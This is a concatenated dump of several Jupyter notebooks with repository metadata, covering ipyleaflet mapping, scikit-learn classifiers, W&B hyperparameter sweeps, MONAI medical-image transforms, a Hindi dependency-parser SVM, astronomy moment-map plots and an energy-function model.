"if not os.path.exists('europe_110.geo.json'): \n url = 'https://github.com/jupyter-widgets/ipyleaflet/raw/master/examples/europe_110.geo.json' \n r = requests.get(url) \n with open('europe_110.geo.json', 'w') as f: \n f.write(r.content.decode(\"utf-8\"))\n \nwith open('europe_110.geo.json', 'r') as f: \n data = json.load(f)\n\nm = Map(center=(50.6252978589571, 0.34580993652344), zoom=3) \ngeo_json = GeoJSON(data=data, style = {'color': 'green', 'opacity':1, 'weight':1.9, 'dashArray':'9', 'fillOpacity':0.1})\nm.add_layer(geo_json)\nm",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code"
]
] |
cb294daeb3095db12e3f4309e93dff881b140998 | 3,842 | ipynb | Jupyter Notebook | First model CV.ipynb | PaolaRondon/Biomol_classifier | 5590942222561441792eb9eab877fd1159a2e0ac | [
"BSD-3-Clause"
] | null | null | null | First model CV.ipynb | PaolaRondon/Biomol_classifier | 5590942222561441792eb9eab877fd1159a2e0ac | [
"BSD-3-Clause"
] | null | null | null | First model CV.ipynb | PaolaRondon/Biomol_classifier | 5590942222561441792eb9eab877fd1159a2e0ac | [
"BSD-3-Clause"
] | null | null | null | 22.869048 | 84 | 0.544768 | [
[
[
"import pandas as pd\nimport os\nimport time\nimport math\nimport matplotlib.pyplot as plt\n%matplotlib inline \nplt.rcParams.update({'figure.max_open_warning': 0})",
"_____no_output_____"
],
[
"mixed_df=pd.read_csv(\"molecules.csv\",sep=\"\\t\")",
"_____no_output_____"
],
[
"from sklearn.model_selection import cross_validate\nfrom sklearn.svm import LinearSVC",
"_____no_output_____"
],
[
"def get_data_and_true_prediction(df,not_wanted_features:list):\n temp_df=df.drop(not_wanted_features,axis=1)\n y=temp_df[temp_df.columns[-1]]\n x=temp_df.drop([temp_df.columns[-1]],axis=1)\n \n return x,y ",
"_____no_output_____"
],
[
"def get_roc_auc_score(x,y,model): # gets roc auc average\n cv_results = cross_validate(model, x, y, cv=10,scoring=('roc_auc'))\n for c,i in enumerate(cv_results['test_score']):\n print(f\"iteration {c+1}: {i}\")\n roc_auc_avrg=cv_results['test_score'].mean()\n \n return roc_auc_avrg ",
"_____no_output_____"
],
[
"x,y = get_data_and_true_prediction(mixed_df,['m_name'])",
"_____no_output_____"
],
[
"clf = LinearSVC(random_state=0, dual=False)",
"_____no_output_____"
],
[
"score = get_roc_auc_score(x,y,clf)",
"iteration 1: 0.8908730158730158\niteration 2: 0.8883928571428571\niteration 3: 0.8695436507936508\niteration 4: 0.8695436507936508\niteration 5: 0.8694556451612903\niteration 6: 0.9007056451612903\niteration 7: 0.8491155046826222\niteration 8: 0.8985431841831425\niteration 9: 0.9198751300728408\niteration 10: 0.8964620187304891\n"
],
[
"print (f\"default model roc auc score = {score}\")",
"default model roc auc score = 0.8852510302594849\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2962316dabf55926bc2c2ebba8f6dba1f67710 | 340,488 | ipynb | Jupyter Notebook | Hyperparameter Sweeps with TF 2.0 & W&B/Bayesian_Search_W&B.ipynb | joe733/TF-2.0-Hacks | 41e1dcf9d4d77f926731423c2a575067e0a77312 | [
"Apache-2.0"
] | 399 | 2019-05-10T01:30:46.000Z | 2022-03-27T17:20:13.000Z | Hyperparameter Sweeps with TF 2.0 & W&B/Bayesian_Search_W&B.ipynb | joe733/TF-2.0-Hacks | 41e1dcf9d4d77f926731423c2a575067e0a77312 | [
"Apache-2.0"
] | 2 | 2019-11-25T15:46:09.000Z | 2021-03-01T13:25:46.000Z | Hyperparameter Sweeps with TF 2.0 & W&B/Bayesian_Search_W&B.ipynb | joe733/TF-2.0-Hacks | 41e1dcf9d4d77f926731423c2a575067e0a77312 | [
"Apache-2.0"
] | 89 | 2019-06-06T10:16:18.000Z | 2021-12-26T01:32:48.000Z | 64.206675 | 245 | 0.486672 | [
[
[
"# Select TensorFlow 2.0 environment (works only on Colab)\n%tensorflow_version 2.x",
"TensorFlow 2.x selected.\n"
],
[
"# Install wandb (ignore if already done)\n!pip install wandb",
"_____no_output_____"
],
[
"# Authorize wandb\n!wandb login",
"_____no_output_____"
],
[
"# Imports\nfrom tensorflow.keras.models import *\nfrom tensorflow.keras.layers import *\nfrom wandb.keras import WandbCallback\nimport tensorflow as tf\nimport numpy as np\nimport wandb\nimport time",
"_____no_output_____"
],
[
"# Fix the random generator seeds for better reproducibility\ntf.random.set_seed(67)\nnp.random.seed(67)",
"_____no_output_____"
],
[
"# Load the dataset\nfashion_mnist = tf.keras.datasets.fashion_mnist\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\n# Scale the pixel values of the images to \ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n\n# Reshape the pixel values so that they are compatible with\n# the conv layers\ntrain_images = train_images.reshape(-1, 28, 28, 1)\ntest_images = test_images.reshape(-1, 28, 28, 1)",
"Downloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/train-labels-idx1-ubyte.gz\n32768/29515 [=================================] - 0s 0us/step\nDownloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/train-images-idx3-ubyte.gz\n26427392/26421880 [==============================] - 1s 0us/step\nDownloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/t10k-labels-idx1-ubyte.gz\n8192/5148 [===============================================] - 0s 0us/step\nDownloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/t10k-images-idx3-ubyte.gz\n4423680/4422102 [==============================] - 0s 0us/step\n"
],
[
"# Specify the labels of FashionMNIST dataset, it would\n# be needed later 😉\nlabels = [\"T-shirt/top\",\"Trouser\",\"Pullover\",\"Dress\",\"Coat\",\n \"Sandal\",\"Shirt\",\"Sneaker\",\"Bag\",\"Ankle boot\"]",
"_____no_output_____"
],
[
"METHOD = 'bayes' # change to 'random' or 'bayes' when necessary and rerun",
"_____no_output_____"
],
[
"def train():\n # Prepare data tuples\n (X_train, y_train) = train_images, train_labels\n (X_test, y_test) = test_images, test_labels\n \n # Default values for hyper-parameters we're going to sweep over\n configs = {\n 'layers': 128,\n 'batch_size': 64,\n 'epochs': 5,\n 'method': METHOD\n }\n \n # Initilize a new wandb run\n wandb.init(project='hyperparameter-sweeps-comparison', config=configs)\n \n # Config is a variable that holds and saves hyperparameters and inputs\n config = wandb.config\n\n # Add the config items to wandb\n if wandb.run:\n wandb.config.update({k: v for k, v in configs.items() if k not in dict(wandb.config.user_items())})\n \n # Define the model\n model = Sequential([\n Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1)),\n MaxPooling2D((2,2)),\n Conv2D(64, (3, 3), activation='relu'),\n MaxPooling2D((2,2)),\n Conv2D(64, (3, 3), activation='relu'),\n GlobalAveragePooling2D(),\n Dense(config.layers, activation=tf.nn.relu),\n Dense(10, activation='softmax')\n ])\n \n # Compile the model\n model.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n \n # Train the model\n model.fit(X_train, y_train, \n epochs=config.epochs,\n batch_size=config.batch_size,\n validation_data=(X_test, y_test),\n callbacks=[WandbCallback(data_type=\"image\", \n validation_data=(X_test, y_test), labels=labels)])",
"_____no_output_____"
],
[
"# A function to specify the tuning configuration, it would also\n# return us a sweep id (required for running the sweep)\ndef get_sweep_id(method):\n sweep_config = {\n 'method': method,\n 'metric': {\n 'name': 'accuracy',\n 'goal': 'maximize' \n },\n 'parameters': {\n 'layers': {\n 'values': [32, 64, 96, 128, 256]\n },\n 'batch_size': {\n 'values': [32, 64, 96, 128]\n },\n 'epochs': {\n 'values': [5, 10, 15]\n }\n }\n }\n sweep_id = wandb.sweep(sweep_config, project='hyperparameter-sweeps-comparison')\n \n return sweep_id",
"_____no_output_____"
],
[
"# Create a sweep for *grid* search\nsweep_id = get_sweep_id('grid')",
"Create sweep with ID: t1kn8296\nSweep URL: https://app.wandb.ai/sayakpaul/hyperparameter-sweeps-comparison/sweeps/t1kn8296\n"
],
[
"# Run the sweep\nwandb.agent(sweep_id, function=train)",
"wandb: Agent Starting Run: 86mr9bse with config:\n\tbatch_size: 32\n\tepochs: 5\n\tlayers: 32\nwandb: Agent Started Run: 86mr9bse\n"
],
[
"# Create a sweep for *random* search (run METHOD cell first and then train())\nsweep_id = get_sweep_id('random')",
"Create sweep with ID: vb7k0mim\nSweep URL: https://app.wandb.ai/sayakpaul/hyperparameter-sweeps-comparison/sweeps/vb7k0mim\n"
],
[
"# Run the sweep\nwandb.agent(sweep_id, function=train)",
"wandb: Agent Starting Run: 00e6phxg with config:\n\tbatch_size: 96\n\tepochs: 5\n\tlayers: 96\nwandb: Agent Started Run: 00e6phxg\n"
],
[
"# Create a sweep for *Bayesian* search (run METHOD cell first and then train())\nsweep_id = get_sweep_id('bayes')",
"Create sweep with ID: pu7llntm\nSweep URL: https://app.wandb.ai/sayakpaul/hyperparameter-sweeps-comparison/sweeps/pu7llntm\n"
],
[
"# Run the sweep\nwandb.agent(sweep_id, function=train)",
"wandb: Agent Starting Run: s4a9kng3 with config:\n\tbatch_size: 32\n\tepochs: 5\n\tlayers: 64\nwandb: Agent Started Run: s4a9kng3\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb296f780991406eda18548d07e9ef06a8ceb0b4 | 84,263 | ipynb | Jupyter Notebook | examples/notebooks/integrate_3rd_party_transforms.ipynb | erexhepa/MONAI | 98210a266db428a0769fde260dda0703b1c4ea95 | [
"Apache-2.0"
] | 1 | 2020-07-09T08:03:22.000Z | 2020-07-09T08:03:22.000Z | examples/notebooks/integrate_3rd_party_transforms.ipynb | erexhepa/MONAI | 98210a266db428a0769fde260dda0703b1c4ea95 | [
"Apache-2.0"
] | null | null | null | examples/notebooks/integrate_3rd_party_transforms.ipynb | erexhepa/MONAI | 98210a266db428a0769fde260dda0703b1c4ea95 | [
"Apache-2.0"
] | null | null | null | 254.570997 | 74,728 | 0.92381 | [
[
[
"# Integrate 3rd party transforms into MONAI program",
"_____no_output_____"
],
[
"This tutorial shows how to integrate 3rd party transforms into MONAI program. \nMainly shows transforms from `BatchGenerator`, `TorchIO`, `Rising` and `ITK`.",
"_____no_output_____"
]
],
[
[
"! pip install batchgenerators==0.20.1",
"_____no_output_____"
],
[
"! pip install torchio==0.16.21",
"_____no_output_____"
],
[
"! pip install rising==0.2.0",
"_____no_output_____"
],
[
"! pip install itk==5.1.0",
"_____no_output_____"
],
[
"# Copyright 2020 MONAI Consortium\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom monai.transforms import \\\n LoadNiftid, AddChanneld, ScaleIntensityRanged, CropForegroundd, \\\n Spacingd, Orientationd, SqueezeDimd, ToTensord, adaptor, Compose\nimport monai\nfrom monai.utils import set_determinism\nfrom batchgenerators.transforms.color_transforms import ContrastAugmentationTransform\nfrom torchio.transforms import RescaleIntensity\nfrom rising.random import DiscreteParameter\nfrom rising.transforms import Mirror\nfrom itk import median_image_filter",
"_____no_output_____"
]
],
[
[
"## Set MSD Spleen dataset path\nThe Spleen dataset can be downloaded from http://medicaldecathlon.com/.",
"_____no_output_____"
]
],
[
[
"data_root = '/workspace/data/medical/Task09_Spleen'\ntrain_images = sorted(glob.glob(os.path.join(data_root, 'imagesTr', '*.nii.gz')))\ntrain_labels = sorted(glob.glob(os.path.join(data_root, 'labelsTr', '*.nii.gz')))\ndata_dicts = [{'image': image_name, 'label': label_name}\n for image_name, label_name in zip(train_images, train_labels)]",
"_____no_output_____"
]
],
[
[
"## Set deterministic training for reproducibility",
"_____no_output_____"
]
],
[
[
"set_determinism(seed=0)",
"_____no_output_____"
]
],
[
[
"## Setup MONAI transforms",
"_____no_output_____"
]
],
[
[
"monai_transforms = [\n LoadNiftid(keys=['image', 'label']),\n AddChanneld(keys=['image', 'label']),\n Spacingd(keys=['image', 'label'], pixdim=(1.5, 1.5, 2.), mode=('bilinear', 'nearest')),\n Orientationd(keys=['image', 'label'], axcodes='RAS'),\n ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),\n CropForegroundd(keys=['image', 'label'], source_key='image')\n]",
"_____no_output_____"
]
],
[
[
"## Setup BatchGenerator transforms\nNote:\n1. BatchGenerator requires the arg is `**data`, can't compose with MONAI transforms directly, need `adaptor`.\n2. BatchGenerator requires data shape is [B, C, H, W, D], MONAI requires [C, H, W, D].",
"_____no_output_____"
]
],
[
[
"batch_generator_transforms = ContrastAugmentationTransform(data_key='image')",
"_____no_output_____"
]
],
[
[
"## Setup TorchIO transforms\nNote:\n1. TorchIO specifies several keys internally, use `adaptor` if conflicts.\n2. There are few example or tutorial, hard to quickly get start.\n3. The TorchIO transforms depend on many TorchIO modules(Subject, Image, ImageDataset, etc.), not easy to support MONAI dict input data.\n4. It can handle PyTorch Tensor data(shape: [C, H, W, D]) directly, so used it to handle Tensor in this tutorial.\n5. If input data is Tensor, it can't support dict type, need `adaptor`.",
"_____no_output_____"
]
],
[
[
"torchio_transforms = RescaleIntensity(out_min_max=(0., 1.), percentiles=(0.05, 99.5))",
"_____no_output_____"
]
],
[
[
"## Setup Rising transforms\nNote:\n1. Rising inherits from PyTorch `nn.Module`, expected input data type is PyTorch Tensor, so can only work after `ToTensor`.\n2. Rising requires data shape is [B, C, H, W, D], MONAI requires [C, H, W, D].\n3. Rising requires the arg is `**data`, need `adaptor`.",
"_____no_output_____"
]
],
[
[
"rising_transforms = Mirror(dims=DiscreteParameter((0, 1, 2)), keys=['image', 'label'])",
"_____no_output_____"
]
],
[
[
"## Setup ITK transforms\nNote:\n1. ITK transform function API has several args(not only `data`), need to set args in wrapper before Compose.\n2. If input data is Numpy, ITK can't support dict type, need wrapper to convert the format.\n3. ITK expects input shape [H, W, [D]], so handle every channel and stack the results.",
"_____no_output_____"
]
],
[
[
"def itk_transforms(x):\n smoothed = list()\n for channel in x['image']:\n smoothed.append(median_image_filter(channel, radius=2))\n x['image'] = np.stack(smoothed)\n return x",
"_____no_output_____"
]
],
[
[
"## Compose all transforms",
"_____no_output_____"
]
],
[
[
"transform = Compose(monai_transforms + [\n itk_transforms,\n # add another dim as BatchGenerator and Rising expects shape [B, C, H, W, D]\n AddChanneld(keys=['image', 'label']),\n adaptor(batch_generator_transforms, {'image': 'image'}),\n ToTensord(keys=['image', 'label']),\n adaptor(rising_transforms, {'image': 'image', 'label': 'label'}),\n # squeeze shape from [B, C, H, W, D] to [C, H, W, D] for TorchIO transforms\n SqueezeDimd(keys=['image', 'label'], dim=0),\n adaptor(torchio_transforms, 'image', {'image': 'data'})\n])",
"_____no_output_____"
]
],
[
[
"## Check transforms in DataLoader",
"_____no_output_____"
]
],
[
[
"check_ds = monai.data.Dataset(data=data_dicts, transform=transform)\ncheck_loader = monai.data.DataLoader(check_ds, batch_size=1)\ncheck_data = monai.utils.misc.first(check_loader)\nimage, label = (check_data['image'][0][0], check_data['label'][0][0])\nprint(f\"image shape: {image.shape}, label shape: {label.shape}\")\n# plot the slice [:, :, 80]\nplt.figure('check', (12, 6))\nplt.subplot(1, 2, 1)\nplt.title('image')\nplt.imshow(image[:, :, 80], cmap='gray')\nplt.subplot(1, 2, 2)\nplt.title('label')\nplt.imshow(label[:, :, 80])\nplt.show()",
"image shape: torch.Size([329, 282, 136]), label shape: torch.Size([329, 282, 136])\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb297d14969e03e8e272cb34f59f30c9caac5480 | 12,838 | ipynb | Jupyter Notebook | src/word_et.ipynb | veeral-agarwal/Dependency-Parser-Hindi | 4421e4165093acbc788090aef5c0f90259837f72 | [
"MIT"
] | null | null | null | src/word_et.ipynb | veeral-agarwal/Dependency-Parser-Hindi | 4421e4165093acbc788090aef5c0f90259837f72 | [
"MIT"
] | null | null | null | src/word_et.ipynb | veeral-agarwal/Dependency-Parser-Hindi | 4421e4165093acbc788090aef5c0f90259837f72 | [
"MIT"
] | null | null | null | 42.509934 | 276 | 0.341798 | [
[
[
"import sys\nimport pickle\nimport json\nimport re\nimport numpy as np\nfrom scipy.sparse import csr_matrix\nfrom sklearn.svm import LinearSVC\nfrom sklearn.metrics import classification_report",
"_____no_output_____"
],
[
"def feature_transform(train_file, words):\n \n words_len = len(words)\n row_idx = []\n column_idx = []\n data = []\n y = []\n ctr = 0\n feature_length = words_len # Per head\n\n f = open(train_file)\n\n for line in f:\n if(line.rstrip()):\n line = re.sub(\"\\s+\",\" \",line)\n line1 = line.split(\";\")\n\n a1 = line1[0].split(\" \")\n a2 = line1[1].split(\" \")\n a3 = line1[2].split(\" \")\n a4 = line1[3].strip()\n\n\n if a3[1] != \"U\":\n \n ctr += 1\n if(a1[0] == \"H\"):\n column_idx.append(words.index(a1[1]))\n\n elif(a1[0] == \"ROOT\"):\n column_idx.append(words.index(\"ROOT\"))\n\n row_idx += [ctr-1]*2\n data += [1] *2\n column_idx.append(feature_length + words.index(a2[2]))\n\n y.append(a4)\n\n f.close()\n\n X = csr_matrix((data, (row_idx, column_idx)), shape=(ctr,2*(words_len)))\n \n \n return X, y",
"_____no_output_____"
],
[
"listfile = \"data_tokens.json\"\nf = open(listfile)\ndata = json.load(f)\nf.close()\n\nwords = data[\"words\"]\n\ntrain_file = 'training_data.txt'\ntest_file = \"testing_data.txt\"\n\nX_train, y_train = feature_transform(train_file, words)\nX_test, y_test = feature_transform(test_file, words)\n\n\nmodel = LinearSVC()\nmodel.fit(X_train, y_train)\n\npred_train = model.predict(X_train)\npred_test = model.predict(X_test)",
"_____no_output_____"
],
[
"print(classification_report(y_train, pred_train))",
"/home/ayan/anaconda3/lib/python3.8/site-packages/sklearn/metrics/_classification.py:1221: UndefinedMetricWarning: Precision and F-score are ill-defined and being set to 0.0 in labels with no predicted samples. Use `zero_division` parameter to control this behavior.\n _warn_prf(average, modifier, msg_start, len(result))\n"
],
[
"print(classification_report(y_test, pred_test))",
" precision recall f1-score support\n\n K7a 0.00 0.00 0.00 1\n ROOT 1.00 1.00 1.00 1432\n UNDEF 0.00 0.00 0.00 0\n adv 0.74 0.65 0.69 147\n ccof 0.86 0.96 0.91 1558\n fragof 0.00 0.00 0.00 0\n jjmod 0.94 0.84 0.89 80\n k1 0.58 0.72 0.64 1584\n k1s 0.73 0.47 0.57 210\n k1u 0.00 0.00 0.00 9\n k2 0.67 0.59 0.63 1369\n k2g 0.00 0.00 0.00 0\n k2p 0.37 0.17 0.24 40\n k2s 0.33 0.07 0.11 29\n k2u 0.00 0.00 0.00 1\n k3 0.25 0.09 0.14 54\n k4 0.47 0.38 0.42 197\n k4a 0.30 0.18 0.22 17\n k5 0.31 0.09 0.14 125\n k7 0.53 0.43 0.47 831\n k7a 0.60 0.19 0.29 94\n k7p 0.55 0.61 0.58 434\n k7t 0.79 0.78 0.79 615\n k7tu 0.00 0.00 0.00 1\n mod 0.00 0.00 0.00 1\n nmod 0.70 0.59 0.64 489\n nmod__emph 1.00 0.33 0.50 3\n nmod__k1inv 0.55 0.69 0.61 78\n nmod__k2inv 0.29 0.16 0.20 32\nnmod__pofinv 0.00 0.00 0.00 3\n nmod__relc 0.71 0.65 0.68 23\n pof 0.69 0.81 0.74 1063\n pof__inv 0.00 0.00 0.00 1\n r6 0.77 0.86 0.81 1686\n r6-k1 0.14 0.11 0.12 18\n r6-k2 0.57 0.57 0.57 184\n ras-NEG 0.00 0.00 0.00 6\n ras-k1 0.13 0.06 0.08 52\n ras-k2 0.00 0.00 0.00 20\n ras-k7 0.00 0.00 0.00 3\n ras-k7p 0.00 0.00 0.00 2\n ras-pof 0.00 0.00 0.00 1\n rbmod 0.67 1.00 0.80 2\n rbmod__relc 0.00 0.00 0.00 1\n rd 0.25 0.08 0.12 25\n rh 0.47 0.40 0.43 100\n rs 0.00 0.00 0.00 21\n rsp 0.38 0.19 0.25 16\n rsym 1.00 1.00 1.00 1419\n rt 0.46 0.40 0.43 188\n sent-adv 0.67 0.68 0.68 69\n vmod 0.73 0.55 0.63 288\n\n accuracy 0.75 14622\n macro avg 0.39 0.33 0.35 14622\nweighted avg 0.73 0.75 0.73 14622\n\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb299203f44189bb51b4c65ee32f42f09eab64db | 8,247 | ipynb | Jupyter Notebook | plot_scripts/Fig15-TDG_candidates_moments.ipynb | AMIGA-IAA/hcg-16 | 8c110ee6f9e39e5d285c74678c806bf273b558b3 | [
"MIT"
] | 2 | 2019-07-10T12:16:22.000Z | 2019-08-09T12:47:00.000Z | plot_scripts/Fig15-TDG_candidates_moments.ipynb | AMIGA-IAA/hcg-16 | 8c110ee6f9e39e5d285c74678c806bf273b558b3 | [
"MIT"
] | 9 | 2019-03-08T16:27:07.000Z | 2021-09-22T17:03:10.000Z | plot_scripts/Fig15-TDG_candidates_moments.ipynb | AMIGA-IAA/hcg-16 | 8c110ee6f9e39e5d285c74678c806bf273b558b3 | [
"MIT"
] | null | null | null | 28.835664 | 561 | 0.565781 | [
[
[
"import matplotlib,aplpy\nfrom astropy.io import fits\nfrom general_functions import *\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"font = {'size' : 14, 'family' : 'serif', 'serif' : 'cm'}\nplt.rc('font', **font)\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['lines.linewidth'] = 1\nplt.rcParams['axes.linewidth'] = 1\n\n#Set to true to save pdf versions of figures\nsave_figs = True",
"_____no_output_____"
]
],
[
[
"The files used to make the following plot are:",
"_____no_output_____"
]
],
[
[
"r_image_decals = 'HCG16_DECaLS_r_cutout.fits'\ngrz_image_decals = 'HCG16_DECaLS_cutout.jpeg'\nobj_list = ['NW_clump','E_clump','S_clump']\n#+'_mom0th.fits' or +'_mom1st.fits'",
"_____no_output_____"
]
],
[
[
"1. An $r$-band DECaLS fits image of HCG 16.\n2. A combined $grz$ jpeg image from DECaLS covering exactly the same field.\n\nThese files were downloaded directly from the [DECaLS public website](http://legacysurvey.org/). The exact parameters defining the region and pixel size of these images is contained in the [pipeline.yml](pipeline.yml) file.\n\n3. Moment 0 and 1 maps of each candidate tidal dwarf galaxy.\n\nThe moment 0 and 1 maps of the galaxies were generated in the *imaging* step of the workflow using CASA. The exact steps are included in the [imaging.py](casa/imaging.py) script. The masks used to make these moment maps were constructed manually using the [SlicerAstro](http://github.com/Punzo/SlicerAstro) software package. They were downloaded along with the raw data from the EUDAT service [B2SHARE](http://b2share.eudat.eu) at the beginnning of the workflow execution. The exact location of the data are given in the [pipeline.yml](pipeline.yml) file.",
"_____no_output_____"
],
[
"Make moment 0 contour overlays and moment 1 maps.",
"_____no_output_____"
]
],
[
[
"#Initialise figure using DECaLS r-band image\nf = aplpy.FITSFigure(r_image_decals,figsize=(6.,4.3),dimensions=[0,1])\n\n#Display DECaLS grz image\nf.show_rgb(grz_image_decals)\n\n#Recentre and resize\nf.recenter(32.356, -10.125, radius=1.5/60.)\n\n#Overlay HI contours\nf.show_contour(data='NW_clump'+'_mom0th.fits',dimensions=[0,1],slices=[0],\n colors='lime',levels=numpy.arange(0.1,5.,0.05))\n\n#Add grid lines\nf.add_grid()\nf.grid.set_color('black')\n\n#Save\nif save_figs:\n plt.savefig('Fig15-NW_clump_mom0_cont.pdf')",
"_____no_output_____"
],
[
"#Clip the moment 1 map\nmask_mom1(gal='NW_clump',level=0.1)\n\n#Initialise figure for clipped map\nf = aplpy.FITSFigure('tmp.fits',figsize=(6.,4.3),dimensions=[0,1])\n\n#Recentre and resize\nf.recenter(32.356, -10.125, radius=1.5/60.)\n\n#Set colourbar scale\nf.show_colorscale(cmap='jet',vmin=3530.,vmax=3580.)\n\n#Add grid lines\nf.add_grid()\nf.grid.set_color('black')\n\n#Show and label colourbar \nf.add_colorbar()\nf.colorbar.set_axis_label_text('$V_\\mathrm{opt}$ [km/s]')\n\n#Add beam ellipse\nf.add_beam()\nf.beam.set_color('k')\nf.beam.set_corner('bottom right')\n\n#Save\nif save_figs:\n plt.savefig('Fig15-NW_clump_mom1.pdf')",
"_____no_output_____"
],
[
"#Initialise figure using DECaLS r-band image\nf = aplpy.FITSFigure(r_image_decals,figsize=(6.,4.3),dimensions=[0,1])\n\n#Display DECaLS grz image\nf.show_rgb(grz_image_decals)\n\n#Recentre and resize\nf.recenter(32.463, -10.181, radius=1.5/60.)\n\n#Overlay HI contours\nf.show_contour(data='E_clump'+'_mom0th.fits',dimensions=[0,1],slices=[0],\n colors='lime',levels=numpy.arange(0.1,5.,0.05))\n\n#Add grid lines\nf.add_grid()\nf.grid.set_color('black')\n\n#Save\nif save_figs:\n plt.savefig('Fig15-E_clump_mom0_cont.pdf')",
"_____no_output_____"
],
[
"#Clip the moment 1 map\nmask_mom1(gal='E_clump',level=0.1)\n\n#Initialise figure for clipped map\nf = aplpy.FITSFigure('tmp.fits',figsize=(6.,4.3),dimensions=[0,1])\n\n#Recentre and resize\nf.recenter(32.463, -10.181, radius=1.5/60.)\n\n#Set colourbar scale\nf.show_colorscale(cmap='jet',vmin=3875.,vmax=3925.)\n\n#Add grid lines\nf.add_grid()\nf.grid.set_color('black')\n\n#Show and label colourbar \nf.add_colorbar()\nf.colorbar.set_axis_label_text('$V_\\mathrm{opt}$ [km/s]')\n\n#Add beam ellipse\nf.add_beam()\nf.beam.set_color('k')\nf.beam.set_corner('bottom right')\n\n#Save\nif save_figs:\n plt.savefig('Fig15-E_clump_mom1.pdf')",
"_____no_output_____"
],
[
"#Initialise figure using DECaLS r-band image\nf = aplpy.FITSFigure(r_image_decals,figsize=(6.,4.3),dimensions=[0,1])\n\n#Display DECaLS grz image\nf.show_rgb(grz_image_decals)\n\n#Recentre and resize\nf.recenter(32.475, -10.215, radius=1.5/60.)\n\n#Overlay HI contours\nf.show_contour(data='S_clump'+'_mom0th.fits',dimensions=[0,1],slices=[0],\n colors='lime',levels=numpy.arange(0.1,5.,0.05))\n\n#Add grid lines\nf.add_grid()\nf.grid.set_color('black')\n\n#Save\nif save_figs:\n plt.savefig('Fig15-S_clump_mom0_cont.pdf')",
"_____no_output_____"
],
[
"#Clip the moment 1 map\nmask_mom1(gal='S_clump',level=0.1)\n\n#Initialise figure for clipped map\nf = aplpy.FITSFigure('tmp.fits',figsize=(6.,4.3),dimensions=[0,1])\n\n#Recentre and resize\nf.recenter(32.475, -10.215, radius=1.5/60.)\n\n#Set colourbar scale\nf.show_colorscale(cmap='jet',vmin=4050.,vmax=4100.)\n\n#Add grid lines\nf.add_grid()\nf.grid.set_color('black')\n\n#Show and label colourbar \nf.add_colorbar()\nf.colorbar.set_axis_label_text('$V_\\mathrm{opt}$ [km/s]')\n\n#Add beam ellipse\nf.add_beam()\nf.beam.set_color('k')\nf.beam.set_corner('bottom right')\n\n#Save\nif save_figs:\n plt.savefig('Fig15-S_clump_mom1.pdf')",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2994b4218aac1dbc757d2269b007556b619e37 | 106,354 | ipynb | Jupyter Notebook | Ref/20.01.1300_find_eps_base_F/find_Z_opt_eps_nvar40_g1_nseq5k.ipynb | danhtaihoang/e-machine | 9ff075ce1e476b8136da291b05abb34c71a4df9d | [
"MIT"
] | null | null | null | Ref/20.01.1300_find_eps_base_F/find_Z_opt_eps_nvar40_g1_nseq5k.ipynb | danhtaihoang/e-machine | 9ff075ce1e476b8136da291b05abb34c71a4df9d | [
"MIT"
] | null | null | null | Ref/20.01.1300_find_eps_base_F/find_Z_opt_eps_nvar40_g1_nseq5k.ipynb | danhtaihoang/e-machine | 9ff075ce1e476b8136da291b05abb34c71a4df9d | [
"MIT"
] | null | null | null | 117.518232 | 45,572 | 0.865111 | [
[
[
"import matplotlib.pyplot as plt\nimport numpy as np\nimport numpy.linalg as nplin\nimport itertools\n#from coniii import *\nfrom sklearn.linear_model import LinearRegression",
"_____no_output_____"
],
[
"np.random.seed(0)",
"_____no_output_____"
],
[
"def operators(s):\n #generate terms in the energy function\n n_seq,n_var = s.shape\n ops = np.zeros((n_seq,n_var+int(n_var*(n_var-1)/2.0)))\n\n jindex = 0\n for index in range(n_var):\n ops[:,jindex] = s[:,index]\n jindex +=1\n\n for index in range(n_var-1):\n for index1 in range(index+1,n_var):\n ops[:,jindex] = s[:,index]*s[:,index1]\n jindex +=1\n \n return ops",
"_____no_output_____"
],
[
"def energy_ops(ops,w):\n return np.sum(ops*w[np.newaxis,:],axis=1)",
"_____no_output_____"
],
[
